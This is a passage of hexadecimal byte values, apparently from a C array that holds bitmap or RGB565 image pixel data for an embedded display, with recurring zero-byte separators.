	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xCE, 
	0x1A, 0xAE, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xCE, 0x1A, 0xAE, 
	0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 
	0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAD, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xCF, 
	0x1A, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 
	0x12, 0xCF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0xAE, 
	0x12, 0xAE, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAE, 0x12, 0x00, 0x00, 0x00, 0x00, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0xAD, 
	0x12, 0x8D, 0x12, 0x6D, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0xCE, 0x1A, 0xEF, 0x1A, 0xCE, 0x1A, 0xAE, 
	0x12, 0x8D, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xCF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x1A, 0xAD, 0x12, 0x6D, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0xAD, 
	0x12, 0xAD, 0x12, 0xAD, 0x12, 0x6D, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0xCE, 0x1A, 0xEF, 0x1A, 0xCF, 
	0x1A, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0xAD, 
	0x12, 0xCE, 0x1A, 0xCE, 0x1A, 0xAD, 0x12, 0x6D, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0xAD, 
	0x12, 0xAE, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0x00, 0x00, 0x00, 0x00, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xAD, 0x12, 0x39, 0x6E, 0x4B, 0x6A, 0x4B, 0x12, 0x6C, 0x12, 0x6C, 
	0x12, 0x59, 0x14, 0xFF, 0xFF, 0x4C, 0xB4, 0x8D, 0x12, 0xAE, 0x12, 0xEF, 0x1A, 0xCE, 0x1A, 0x5F, 
	0x6E, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x32, 0xFE, 0x4C, 0x12, 0x8D, 0x12, 0xCE, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xAE, 0x12, 0x90, 0x12, 0x1F, 0x97, 0xF5, 0xFE, 0x4C, 0x42, 0x8D, 
	0x12, 0x8D, 0x12, 0x93, 0x12, 0xFF, 0xB7, 0x32, 0xFE, 0x8D, 0x12, 0xAE, 0x12, 0xEF, 0x1A, 0xCF, 
	0x1A, 0x7C, 0x45, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x15, 0xFF, 0x4C, 0x42, 0x8D, 
	0x12, 0xAE, 0x12, 0xAE, 0x12, 0x93, 0x12, 0xFF, 0xB7, 0xF5, 0xFE, 0x4C, 0x42, 0x6D, 0x12, 0x8D, 
	0x12, 0x7C, 0x45, 0xFF, 0xFF, 0x6D, 0xB4, 0x6C, 0x12, 0x6C, 0x12, 0x00, 0x00, 0x00, 0x00, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0x79, 0x14, 0xFF, 0xFF, 0xFC, 0xFF, 0x2A, 0x93, 0x2B, 0x12, 0x2B, 
	0x12, 0x38, 0x14, 0xFF, 0xFF, 0x2B, 0xB4, 0x4C, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0x90, 0x12, 0x1F, 
	0x97, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2B, 0xB4, 0x6D, 0x12, 0xAE, 
	0x12, 0xCF, 0x1A, 0xCF, 0x1A, 0x8D, 0x12, 0x4F, 0x12, 0x1F, 0x97, 0xF4, 0xFE, 0x2B, 0x42, 0x6C, 
	0x12, 0x6C, 0x12, 0x72, 0x12, 0xFF, 0xB7, 0x12, 0xFE, 0x6C, 0x12, 0xAE, 0x12, 0xEF, 0x1A, 0xCF, 
	0x1A, 0x5F, 0x6E, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2E, 0xD5, 0x6C, 
	0x12, 0xAE, 0x12, 0xAE, 0x12, 0x72, 0x12, 0xFF, 0xB7, 0xF4, 0xFE, 0x2B, 0x42, 0x4C, 0x12, 0x76, 
	0x13, 0xFF, 0xD7, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x32, 0xFE, 0x00, 0x00, 0x00, 0x00, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0x93, 0x12, 0xFF, 0xB7, 0xFF, 0xFF, 0xFB, 0xFF, 0x2A, 0x93, 0x0A, 
	0x12, 0x38, 0x14, 0xFF, 0xFF, 0x2A, 0xB4, 0x2B, 0x12, 0x4C, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x4C, 
	0x12, 0x4C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x38, 0x14, 0xFF, 0xFF, 0x2E, 0xD5, 0x6C, 0x12, 0x8D, 
	0x12, 0xAE, 0x12, 0xAE, 0x12, 0x6C, 0x12, 0x4E, 0x12, 0xFF, 0x96, 0x07, 0x8B, 0x4C, 0x12, 0x8D, 
	0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x4C, 0x12, 0x35, 0x13, 0xFF, 
	0xD7, 0x12, 0xFE, 0x06, 0x80, 0x07, 0x0B, 0x42, 0x4B, 0x12, 0x6C, 0x12, 0xAD, 0x12, 0x8D, 0x12, 
	0x3F, 0x6E, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xAD, 0x12, 0x3F, 0x6E, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2A, 0xB4, 0x38, 0x14, 0xFF, 0xFF, 
	0x2A, 0xB4, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x4C, 0x12, 0x35, 0x13, 0xFF, 0xD7, 0x2E, 0xD5, 0x6C, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0x8D, 0x12, 
	0x4B, 0x12, 0x2E, 0x12, 0x07, 0x8B, 0x11, 0xFE, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x4C, 0x12, 0x32, 0x12, 0xFF, 0xB7, 0x07, 0x94, 0x0A, 0x42, 
	0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x59, 0x14, 0x00, 0x00, 
	0x00, 0x00, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xAE, 0x12, 0x3F, 0x6E, 0xF8, 0xFF, 0xF1, 0x69, 
	0xFF, 0xB7, 0xF5, 0xFE, 0x38, 0x44, 0x6C, 0xFF, 0xFF, 0x02, 0x8B, 0x6D, 0x12, 0x76, 0x13, 0x4C, 
	0x94, 0x0B, 0x12, 0x0D, 0x12, 0xFF, 0x96, 0xF4, 0xFE, 0x0B, 0x42, 0x4C, 0x12, 0x4C, 0x12, 0x52, 
	0x12, 0x13, 0x88, 0xEA, 0x41, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0x6D, 
	0x12, 0x4C, 0x12, 0x08, 0x84, 0x0A, 0x6A, 0x2E, 0x12, 0x32, 0x95, 0x38, 0x14, 0x0F, 0x8B, 0x3F, 
	0x6E, 0xF8, 0xFF, 0xEA, 0x69, 0xED, 0x11, 0xFF, 0x96, 0xF4, 0xFE, 0x0A, 0x42, 0x2B, 0x12, 0x2B, 
	0x12, 0x32, 0x12, 0xFF, 0xB7, 0x6B, 0xFF, 0xFF, 0x08, 0x87, 0x18, 0x14, 0xFF, 0xFF, 0x2B, 0xB4, 
	0x4C, 0x12, 0x6C, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x08, 0x9D, 0x0B, 0x6A, 0x4C, 0x12, 0x4C, 0x12, 
	0x59, 0x14, 0xFF, 0xFF, 0x0A, 0xB4, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 
	0x4C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x35, 0x13, 0xFF, 0xD7, 0x2E, 0xD5, 0x6C, 0x12, 0x8D, 0x12, 
	0x79, 0x14, 0xFF, 0xFF, 0x0D, 0xD5, 0xED, 0x11, 0xFF, 0x96, 0xF4, 0xFE, 0xEA, 0x41, 0x0B, 0x12, 
	0x0B, 0x12, 0x12, 0x12, 0x0D, 0x8E, 0x4C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x52, 0x12, 0xFF, 0xB7, 
	0xF4, 0xFE, 0xE9, 0x41, 0x18, 0x14, 0xFF, 0xFF, 0x0D, 0xB4, 0xFF, 0x96, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0x08, 0x84, 0x2B, 0x6A, 0x6C, 0x12, 0x6C, 0x12, 0x79, 0x14, 0x6C, 0xFF, 0xFF, 0x03, 
	0x9B, 0xB0, 0x12, 0x1F, 0x97, 0xF8, 0xFF, 0xED, 0x69, 0xFF, 0x96, 0xF4, 0xFE, 0xEA, 0x41, 0xED, 
	0x11, 0xF8, 0x96, 0x15, 0x93, 0xFF, 0xB7, 0x11, 0xFE, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 
	0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x12, 0x12, 0xFF, 0xB7, 0x12, 0xFE, 0x4C, 
	0x12, 0x6D, 0x12, 0x6D, 0x12, 0x32, 0x12, 0x00, 0x04, 0x80, 0x06, 0xAD, 0x12, 0xAE, 0x12, 0x79, 
	0x14, 0xFF, 0xFF, 0x11, 0xD5, 0xFF, 0x96, 0xF4, 0xFE, 0xE9, 0x41, 0x1F, 0x6E, 0xFF, 0xFF, 0x11, 
	0xB4, 0xFF, 0xB7, 0x11, 0xFE, 0x2B, 0x12, 0x4C, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 
	0x12, 0x8D, 0x12, 0x4C, 0x12, 0x32, 0x12, 0xFF, 0xB7, 0x12, 0xFE, 0x4B, 0x12, 0x4C, 0x12, 0x4C, 
	0x12, 0x12, 0x12, 0xFF, 0xB7, 0xF4, 0xFE, 0xE9, 0x41, 0x18, 0x14, 0xFF, 0xFF, 0x0A, 0xB4, 0x0A, 
	0x12, 0x0B, 0x12, 0x2B, 0x12, 0x4B, 0x12, 0x0A, 0x9C, 0x6D, 0x12, 0x79, 0x14, 0xFF, 0xFF, 0x2B, 
	0xB4, 0x2B, 0x12, 0x4B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4B, 
	0x12, 0x35, 0x13, 0xFF, 0xD7, 0x4F, 0xD5, 0x8D, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xB0, 0x12, 0x1F, 
	0x97, 0xF8, 0xFE, 0xFF, 0xB6, 0xF4, 0xFE, 0x18, 0x44, 0xFF, 0xFF, 0x11, 0xFE, 0x11, 0x12, 0xFF, 
	0xB7, 0x6B, 0xFF, 0xFF, 0x01, 0x9A, 0x2B, 0x12, 0x55, 0x13, 0x4B, 0x94, 0xF1, 0x11, 0xFF, 0xB7, 
	0xF4, 0xFE, 0xE9, 0x41, 0x18, 0x14, 0xFF, 0xFF, 0x2A, 0xB4, 0x35, 0x43, 0xF8, 0xB7, 0x4B, 0x6A, 
	0x4B, 0x12, 0x00, 0x00, 0x00, 0x00, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0x8D, 0x12, 0x3F, 0x6E, 
	0xF8, 0xFF, 0x0B, 0x6A, 0x4C, 0x12, 0x4C, 0x12, 0x79, 0x14, 0x6C, 0xFF, 0xFF, 0x8D, 0x4E, 0xD5, 
	0x6C, 0x12, 0xAD, 0x12, 0xCE, 0x1A, 0xAE, 0x12, 0x79, 0x14, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xF8, 0xFF, 0x2B, 0x6A, 0x32, 0x12, 0x0E, 0x83, 0x1F, 0x6E, 0x15, 0xFF, 0xF1, 0x41, 
	0x06, 0x90, 0x38, 0x14, 0xFF, 0xFF, 0x15, 0xFF, 0x0B, 0x42, 0x00, 0x00, 0x00, 0x00, 0xCF, 0x1A, 
	0xAE, 0x12, 0xAD, 0x12, 0x4C, 0x12, 0x1F, 0x6E, 0xF8, 0xFF, 0x0A, 0x6A, 0x2B, 0x12, 0x4B, 0x12, 
	0x59, 0x14, 0x0C, 0x80, 0x3F, 0x2E, 0xD5, 0x4C, 0x12, 0x6D, 0x12, 0xAD, 0x12, 0x8D, 0x12, 0x72, 
	0x12, 0xFF, 0xB7, 0xFF, 0xFF, 0xF4, 0xFE, 0x1F, 0x96, 0x2B, 0xB4, 0x2B, 0x12, 0x32, 0x12, 0xFF, 
	0xB7, 0x11, 0xFE, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 
	0x12, 0x2B, 0x12, 0x12, 0x12, 0xFF, 0xB7, 0x12, 0xFE, 0x4B, 0x12, 0x5C, 0x45, 0xFF, 0xFF, 0x15, 
	0xD5, 0xFF, 0xB7, 0xF4, 0xFE, 0xE9, 0x41, 0x18, 0x14, 0xFF, 0xFF, 0x2B, 0xB4, 0x2B, 0x12, 0x1F, 
	0x6E, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xCF, 0x1A, 0xAE, 0x12, 0xAD, 0x12, 0x6C, 
	0x12, 0x3F, 0x6E, 0xF8, 0xFF, 0x2B, 0x6A, 0x4C, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4C, 
	0x12, 0x4C, 0x12, 0x4B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x0B, 0x12, 0x2B, 0x12, 0x2B, 0x12, 0x4B, 
	0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x4C, 
	0x12, 0x3C, 0x45, 0xFF, 0xFF, 0xF4, 0xFE, 0xEA, 0x41, 0x2B, 0x12, 0x2B, 0x12, 0x32, 0x12, 0xFF, 
	0xB7, 0x12, 0xFE, 0x4C, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x6C, 
	0x12, 0x4C, 0x12, 0x52, 0x12, 0xFF, 0xB7, 0x32, 0xFE, 0x6C, 0x12, 0x72, 0x12, 0xFF, 0xB7, 0xFF, 
	0xFF, 0xFF, 0xFF, 0x06, 0x8D, 0x32, 0x12, 0xFF, 0xB7, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xCF, 
	0x1A, 0x7C, 0x45, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xF9, 0xFF, 0x4C, 0x6A, 0x3F, 0x6E, 0x70, 
	0xFF, 0xFF, 0x8C, 0x4F, 0xD5, 0x6D, 0x12, 0x8D, 0x12, 0x4C, 0x12, 0x35, 0x13, 0xFF, 0xD7, 0xF4, 
	0xFE, 0x0A, 0x42, 0x2B, 0x12, 0x4B, 0x12, 0x52, 0x12, 0xFF, 0xB7, 0x6B, 0xFF, 0xFF, 0x01, 0x83, 
	0x8D, 0x12, 0x8D, 0x12, 0x5C, 0x45, 0x06, 0x85, 0x2A, 0xB4, 0x2B, 0x12, 0x2B, 0x12, 0x1F, 0x6E, 
	0xFB, 0xFF, 0x08, 0x81, 0x6C, 0x6A, 0x12, 0x8A, 0x3F, 0x6E, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFC, 0xFF, 0x73, 0x93, 0x0C, 0x80, 0x0A, 0x33, 
	0xFE, 0xAE, 0x12, 0xAE, 0x12, 0xB3, 0x12, 0xFF, 0xB7, 0xFF, 0xFF, 0xF5, 0xFE, 0xE9, 0x41, 0x18, 
	0x14, 0xFF, 0xFF, 0x2A, 0xB4, 0x2B, 0x12, 0x4B, 0x12, 0x56, 0x13, 0xFF, 0xD7, 0x00, 0x00, 0x00, 
	0x00, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0x6C, 0x12, 0x4C, 
	0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x0E, 0x12, 0xFF, 
	0x96, 0xF4, 0xFE, 0xEA, 0x41, 0x0B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x6C, 
	0x12, 0x6D, 0x12, 0x09, 0x80, 0x08, 0x6D, 0x93, 0x6C, 0x12, 0x4C, 0x12, 0x2B, 0x12, 0x4B, 0x12, 
	0x2B, 0x12, 0x3C, 0x45, 0xFF, 0xFF, 0x2B, 0xB4, 0x2B, 0x12, 0x2B, 0x12, 0x4C, 0x12, 0x4B, 0x12, 
	0x6D, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xAE, 0x12, 0x5C, 0x45, 0xFF, 0xFF, 0xF5, 0xFE, 0xE9, 0x41, 
	0x18, 0x14, 0xFF, 0xFF, 0x2D, 0xB4, 0x1F, 0x97, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 
	0x00, 0x00, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x1A, 0xAD, 0x12, 0x6D, 0x12, 0x6C, 0x12, 
	0x4C, 0x12, 0x52, 0x12, 0xFF, 0xB7, 0x6D, 0xFF, 0xFF, 0x80, 0x03, 0x4F, 0xD5, 0x6D, 0x12, 0x8D, 
	0x12, 0x8D, 0x12, 0x4C, 0x12, 0x2E, 0x12, 0xFF, 0x96, 0xF4, 0xFE, 0x0B, 0x42, 0x4C, 0x12, 0x8D, 
	0x12, 0xAE, 0x12, 0x8D, 0x12, 0x4F, 0x12, 0x1C, 0x97, 0x4F, 0xB4, 0x4C, 0x12, 0x5C, 0x45, 0xFF, 
	0xFF, 0x2B, 0xB4, 0x4B, 0x12, 0x59, 0x14, 0x32, 0xFE, 0x4C, 0x12, 0x6D, 0x12, 0xAE, 0x12, 0xCF, 
	0x1A, 0xCF, 0x1A, 0x76, 0x13, 0xFF, 0xD7, 0xF5, 0xFE, 0xEA, 0x41, 0x18, 0x14, 0xFF, 0xFF, 0x2E, 
	0xB4, 0x08, 0x87, 0xCE, 0x1A, 0xAD, 0x12, 0x6C, 0x12, 0x5C, 0x45, 0x4B, 0xB4, 0x2B, 0x12, 0x32, 
	0x12, 0x0E, 0x83, 0x2E, 0xD5, 0x4C, 0x12, 0x6C, 0x12, 0x08, 0x80, 0x47, 0xAD, 0x12, 0x6C, 0x12, 
	0x58, 0x14, 0xFF, 0xFF, 0x4F, 0xD5, 0x4C, 0x12, 0x5C, 0x45, 0xFF, 0xFF, 0x2B, 0xB4, 0x4B, 0x12, 
	0x3F, 0x6E, 0xFF, 0xFF, 0x2B, 0xB4, 0x4B, 0x12, 0x8D, 0x12, 0xAE, 0x12, 0xCF, 0x1A, 0xAD, 0x12, 
	0x3F, 0x6E, 0xF8, 0xFF, 0xEA, 0x69, 0x38, 0x14, 0xFF, 0xFF, 0x4C, 0xB4, 0x6C, 0x12, 0x6C, 0x12, 
	0x6C, 0x12, 0x4C, 0x12, 0x00, 0x00, 0x00, 0x00, 0xEF, 0x1A, 0xEF, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 
	0x59, 0x14, 0xFF, 0xFF, 0xFC, 0xFF, 0x4B, 0x93, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 
	0x4C, 0x12, 0x2B, 0x12, 0x0E, 0x12, 0xFF, 0x96, 0xF4, 0xFE, 0xEA, 0x41, 0x0B, 0x12, 0x2B, 0x12, 
	0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x6D, 0x12, 0x8D, 0x12, 0x6C, 0x12, 
	0x4F, 0x12, 0x1F, 0x97, 0xF5, 0xFE, 0x0B, 0x42, 0x2B, 0x12, 0x4C, 0x12, 0x6C, 0x12, 0x52, 0x12, 
	0xFF, 0xB7, 0x15, 0xFF, 0x6C, 0x42, 0x6C, 0x12, 0x5C, 0x45, 0xFF, 0xFF, 0x2B, 0xB4, 0x4C, 0x12, 
	0x52, 0x12, 0xFF, 0xB7, 0xF8, 0xFF, 0x2B, 0x6A, 0x6C, 0x12, 0xAE, 0x12, 0xEF, 0x1A, 0xAE, 0x12, 
	0x79, 0x14, 0xFF, 0xFF, 0x0A, 0xB4, 0x38, 0x14, 0xFF, 0xFF, 0x6D, 0xB4, 0xAD, 0x12, 0xAD, 0x12, 
	0xAD, 0x12, 0x8D, 0x12, 0x00, 0x00, 0x00, 0x00, 0xEF, 0x1A, 0xEF, 0x1A, 0xAE, 0x12, 0x76, 0x13, 
	0xFF, 0xD7, 0xFF, 0xFF, 0x4C, 0xB4, 0x6F, 0x12, 0x1F, 0x97, 0x6E, 0xFF, 0xFF, 0x80, 0x11, 0xFC, 
	0xFF, 0x6D, 0x93, 0x93, 0x12, 0xFF, 0xB7, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x15, 0xFF, 0x4B, 
	0x42, 0x4C, 0x12, 0x6C, 0x12, 0x6C, 0x12, 0x3F, 0x6E, 0xFC, 0xFF, 0x4C, 0x93, 0x8D, 0x12, 0x8D, 
	0x12, 0x5C, 0x45, 0xFF, 0xFF, 0x2B, 0xB4, 0x4C, 0x12, 0x6D, 0x12, 0x79, 0x14, 0xFF, 0xFF, 0x4F, 
	0xD5, 0x6D, 0x12, 0xAE, 0x12, 0xEF, 0x1A, 0xCE, 0x1A, 0x76, 0x13, 0xFF, 0xD7, 0x12, 0xFE, 0x4C, 
	0x12, 0x6D, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0x99, 0x14, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 
	0x00, 0xEF, 0x1A, 0xEF, 0x1A, 0x96, 0x13, 0xFF, 0xD7, 0xFF, 0xFF, 0x6D, 0xB4, 0x8D, 0x12, 0x90, 
	0x12, 0x11, 0x80, 0x02, 0x76, 0x13, 0xFF, 0xD7, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 
	0xFF, 0xFF, 0xFF, 0xFF, 0xF9, 0xFF, 0x5C, 0x95, 0xFF, 0xFF, 0x50, 0xD5, 0x8D, 0x12, 0xAE, 0x12, 
	0xAE, 0x12, 0x5C, 0x45, 0xFF, 0xFF, 0x4C, 0xB4, 0x8D, 0x12, 0xAD, 0x12, 0xB1, 0x12, 0x1F, 0x97, 
	0xFF, 0xFF, 0x6D, 0xB4, 0xAE, 0x12, 0xEF, 0x1A, 0xCF, 0x1A, 0xB1, 0x12, 0x1F, 0x97, 0xF9, 0xFF, 
	0x8D, 0x6A, 0xAE, 0x12, 0xCF, 0x1A, 0xCF, 0x1A, 0x07, 0x92, 0xCE, 0x1A, 0x5F, 0x6E, 0x8D, 0xB4, 
	0xAE, 0x12, 0xAE, 0x12, 0xCE, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 
	0xAD, 0x12, 0x90, 0x12, 0x1F, 0x97, 0x16, 0xFF, 0x6C, 0x42, 0x8D, 0x12, 0xAD, 0x12, 0x6A, 0xAE, 
	0x12, 0x80, 0x16, 0x99, 0x14, 0xFF, 0xFF, 0xFF, 0xFF, 0x16, 0xFF, 0x93, 0x42, 0x16, 0xB7, 0xAD, 
	0x42, 0xAE, 0x12, 0xCF, 0x1A, 0xCE, 0x1A, 0x7C, 0x45, 0xFF, 0xFF, 0x6D, 0xB4, 0xAD, 0x12, 0xAE, 
	0x12, 0xCE, 0x1A, 0x96, 0x13, 0x53, 0xD6, 0xAE, 0x12, 0xCE, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 
	0x1A, 0x5F, 0x6E, 0xFC, 0xFF, 0x8D, 0x93, 0xAE, 0x12, 0xCF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 
	0x1A, 0xAE, 0x12, 0x00, 0x00, 0x00, 0x00, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCF, 
	0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xCF, 0x1A, 0xB1, 0x12, 0x1F, 0x97, 0x16, 0xFF, 0xAD, 0x42, 0xAE, 0x12, 0xCF, 0x1A, 0xCA, 
	0x41, 0x08, 0x80, 0x02, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 0xAE, 0x12, 
	0xCE, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0x7C, 0x45, 0xFF, 0xFF, 0x8D, 0xB4, 0xAE, 0x12, 
	0xCF, 0x1A, 0xEF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xEF, 0x1A, 0xCF, 0x1A, 0xCE, 0x1A, 0xCE, 0x1A, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xEF, 0x1A, 0xEF, 0x1A, 0x00, 0x00, 0x00, 0x00, 0x6E, 0xEF, 0x1A, 0x85, 0xCF, 0x1A, 0xCE, 0x1A, 
	0xAE, 0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0x75, 0xEF, 0x1A, 0x84, 0xCF, 0x1A, 0xCE, 0x1A, 0xCE, 0x1A, 
	0xCF, 0x1A, 0x72, 0xEF, 0x1A, 0x10, 0x60, 0x10, 0xEF, 0x1A, 0x00, 0x9C, 0x84, 0xEF, 0x1A, 0xEF, 
	0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0x55, 0x5E, 0x0F, 0xDF, 0x01, 0x3E, 0x01, 0x1B, 0x02, 0x5C, 0x01, 
	0xC1, 0x02, 0x1A, 0xF6, 0x02, 0x03, 0x37, 0x03, 0x22, 0x0C, 0x05, 0x40, 0x1F, 0x43, 0x38, 0xFF, 
	0xFF, 0xC7, 0xEF, 0x1A, 0x85, 0xCF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0xCE, 0x1A, 0xCF, 0x1A, 0x32, 
	0x1E, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 
	0xEF, 0x1A, 0xEF, 0x1A, 0xEF, 0x1A, 0xCE, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x8D, 0x12, 0x8D, 0x12, 
	0xAE, 0x12, 0xD0, 0x33, 0x21, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x88, 0xAD, 0x12, 
	0xAE, 0x12, 0xCF, 0x1A, 0xCF, 0x1A, 0xCF, 0x1A, 0xAE, 0x12, 0x8D, 0x12, 0x6D, 0x12, 0xD7, 0xE1, 
	0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9D, 0x6D, 0x12, 0x8D, 0x12, 0xAD, 0x12, 0xAD, 
